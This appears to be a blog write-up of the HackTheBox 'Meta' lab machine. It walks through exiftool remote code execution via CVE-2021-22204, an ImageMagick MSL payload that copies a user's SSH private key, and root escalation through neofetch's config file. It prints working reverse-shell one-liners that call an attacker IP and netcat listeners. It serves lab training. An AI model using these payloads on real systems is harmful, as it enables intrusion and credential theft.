banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

hackthebox Target Meta Process Record

0x01 Introduction#

image

Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6, mac m1.

0x02 Information Gathering#

Only ports 22 and 80 are open during the port scan.

image

Accessing port 80 on 10.10.11.140 redirects to http://artcorp.htb/, but it is not accessible at the moment. Let's try setting the hosts file and accessing it again.

image

gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt

image

image

Accessing metaview, there is a file upload point.

image

Let's try uploading an image.

image

Through simple information gathering, it is found that the above image is the content parsed by exiftools.

image

0x03 Exploitation#

RCE is possible here, with CVE-2021-22204 as the vulnerability identifier.

Exploit:

Since it is difficult to reproduce this vulnerability on a Mac and requires the exiftool tool, switch to Kali for operation.

Kali's IP is: 10.10.14.14.

Set the IP in the exploit to Kali's IP.

image

Run the exploit file to generate image.jpg.

image

Start listening on Kali.

nc -nlvp 9090

Access http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. A successful shell will be obtained.

image

Set up an interactive terminal.

python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm

0x04 Privilege Escalation#

The current privilege is www-data, and there is no permission to view the user.txt file.

image

find / -perm -4000 -type f 2>/dev/null

image

Use pspy64 to view the running processes on the system and find a sh script convert_images.sh. Let's see what this script contains.

image

The content is as follows:

image

The mogrify command is used to create an image according to specified dimensions, blur, crop, dither, etc. Mogrify overwrites the original image file and writes it to a different image file.

Refer to this article:

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

image

Place this SSH key in the .ssh directory under the home directory of Kali, with the filename id_rsa. Make sure that id_rsa has no spaces in its format and the file permission is 400.

Then SSH login using the id_rsa certificate to obtain user.txt.

ssh -i id_rsa [email protected]

Next, escalate to root privileges.

Run sudo -l and find that it has permission to execute the following command.

image

(root) NOPASSWD: /usr/bin/neofetch \"\"

Run the neofetch command, and the effect is as follows:

image

According to https://gtfobins.github.io/#neo, if the file is run with sudo privileges, sudo can be used for privilege escalation.

image

Review the sudo -l configuration file again and find an environment variable XDG_CONFIG_HOME. We can take advantage of this when neofetch reads the configuration file of the environment variable, and write code to reverse shell in the configuration file. When the neofetch program is executed, a shell will be reversed.

image

The specific steps are as follows:

  1. Prepare a reverse shell script.
bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
  1. Write it at the beginning of /home/thomas/.config/neofetch/config.conf.

image

  1. Import the environment variable.
export XDG_CONFIG_HOME="$HOME/.config"
  1. Start listening with netcat.
nc -nlvp 1234
  1. Execute neofetch.
sudo -u root /usr/bin/neofetch \"\"

A shell will be successfully reversed, and root.txt can be obtained.

0x05 Conclusion#

  1. Couldn't find the target machine for CVE-2021-22204 after searching for a long time. Some of the Docker ones haven't been set up yet. Fortunately, I learned how to exploit the CVE-2021-22204 vulnerability.
  2. Learned about privilege escalation using ImageMagick.
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.